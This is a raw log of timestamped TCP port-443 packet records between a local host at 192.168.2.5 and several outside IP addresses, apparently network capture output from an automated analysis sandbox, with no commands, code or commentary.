Sep 26, 2024 20:14:55.602240086 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:55.602248907 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:55.621083021 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:55.621097088 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:56.276196003 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:56.276263952 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:56.276285887 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:56.276308060 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:56.276336908 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:56.276377916 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:56.277359962 CEST	49735	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:56.277375937 CEST	443	49735	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.002115011 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.002152920 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.002232075 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.002448082 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.002464056 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.690818071 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.690896988 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.691273928 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.691284895 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.693113089 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.693119049 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.693166971 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.693180084 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.693262100 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.693279028 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.693977118 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.694000959 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.694076061 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.694088936 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:57.694102049 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:57.694118977 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.023755074 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.023844004 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.023854017 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.023904085 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.024077892 CEST	49737	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.024104118 CEST	443	49737	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.027673006 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.027709961 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.027779102 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.028017998 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.028034925 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.711353064 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.711457014 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.711879969 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.711890936 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:14:59.713799953 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:14:59.713807106 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:00.520433903 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:00.520519972 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:00.520528078 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:00.520572901 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:00.520790100 CEST	49738	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:00.520812988 CEST	443	49738	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:00.654175043 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:00.654206038 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:00.654392958 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:00.654617071 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:00.654628992 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:01.593280077 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:01.593384981 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:01.725117922 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:01.725136995 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:01.725604057 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:01.725673914 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:01.726027966 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:01.767421961 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.153156042 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.153177977 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.153306961 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.153321981 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.153407097 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.402328968 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.402348995 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.402470112 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.402628899 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.402698040 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.402698040 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.403928041 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.404046059 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.404834986 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.404913902 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.639435053 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.639447927 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.639530897 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.639986992 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.640055895 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.640614033 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.640687943 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.641448975 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.641514063 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.642358065 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.642430067 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.642452002 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.642559052 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.643241882 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.643313885 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.678129911 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.678200960 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.877357960 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.877506018 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.877619982 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.877710104 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.877901077 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.877960920 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.878153086 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.878206968 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.878216028 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.878222942 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.878287077 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.878905058 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.878978014 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.879565001 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.879615068 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.879647017 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.879654884 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.879673004 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.879731894 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.882767916 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.882837057 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.882879019 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.882944107 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.883280039 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.883368969 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.883543015 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.883666039 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.884021044 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.884130955 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.884737015 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.884845018 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.913438082 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.913499117 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.981460094 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.981508970 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.981539965 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.981549978 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:02.981575966 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:02.981587887 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.118256092 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.118356943 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.118514061 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.118576050 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.118649960 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.118727922 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.118824959 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.118896961 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.118967056 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119009972 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119220018 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119276047 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119431973 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119491100 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119601965 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119677067 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119860888 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119898081 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119920969 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119930029 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.119940996 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.119975090 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.122034073 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.122124910 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.122225046 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.122307062 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.122458935 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.122529030 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.122689962 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.122761011 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.122905016 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.122972965 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.123055935 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.123136044 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.205807924 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.205940008 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.205982924 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.206038952 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.206058979 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.206104994 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.206115007 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.206159115 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.206162930 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.206219912 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.206813097 CEST	49739	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:03.206839085 CEST	443	49739	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:03.349728107 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:03.349765062 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:03.349828959 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:03.350753069 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:03.350765944 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:03.705615997 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:03.705652952 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:03.705708027 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:03.707088947 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:03.707099915 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.005737066 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.005892992 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.006304979 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.006309986 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.008121967 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.008128881 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.195869923 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.195931911 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.197674036 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.197680950 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.197884083 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.240674019 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.244378090 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.244389057 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.244492054 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.673114061 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.673187017 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.673381090 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.674695969 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.674710035 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.674762011 CEST	49741	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:04.674767971 CEST	443	49741	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:04.698156118 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:04.698206902 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:04.698302984 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:04.698617935 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:04.698637009 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:04.925332069 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.925403118 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.925441027 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.925455093 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.925724983 CEST	49740	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:04.925746918 CEST	443	49740	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:04.927373886 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:04.927421093 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:04.927500010 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:04.927900076 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:04.927916050 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:05.194823980 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.194896936 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.196429968 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.196439028 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.196718931 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.197936058 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.197953939 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.198007107 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.660012007 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.660118103 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.660341024 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.660444021 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.660470963 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.660484076 CEST	49742	443	192.168.2.5	172.67.132.32
Sep 26, 2024 20:15:05.660490036 CEST	443	49742	172.67.132.32	192.168.2.5
Sep 26, 2024 20:15:05.662026882 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:05.662086964 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:05.662197113 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:05.662669897 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:05.662687063 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:05.872992992 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:05.876790047 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:05.877180099 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:05.877187967 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:05.877341986 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:05.877346039 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.211375952 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.211463928 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.212634087 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.212641954 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.212898970 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.214035034 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.214060068 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.214096069 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.467983007 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.468002081 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.468046904 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.468070030 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.468085051 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.468115091 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.719120026 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.719131947 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.719209909 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.719717026 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.719775915 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.720952034 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.721050024 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.721927881 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.721983910 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.782813072 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.782898903 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.782963991 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.783104897 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.783127069 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.783137083 CEST	49744	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:06.783143997 CEST	443	49744	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:06.801096916 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:06.801135063 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:06.801203966 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:06.801500082 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:06.801512957 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:06.981318951 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.981329918 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.981409073 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.981482029 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.981548071 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.981889009 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.981946945 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.982822895 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.982887030 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.984004974 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.984066010 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.986192942 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.986254930 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:06.986428022 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:06.986490965 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.029300928 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.029405117 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.215245008 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.215368986 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.215509892 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.215567112 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.216584921 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.216660023 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.217453957 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.217531919 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.217681885 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.217735052 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.218678951 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.218748093 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.219558954 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.219620943 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.220451117 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.220520020 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.221385002 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.221450090 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.221457005 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.221508980 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.279871941 CEST	443	49745	188.114.97.3	192.168.2.5
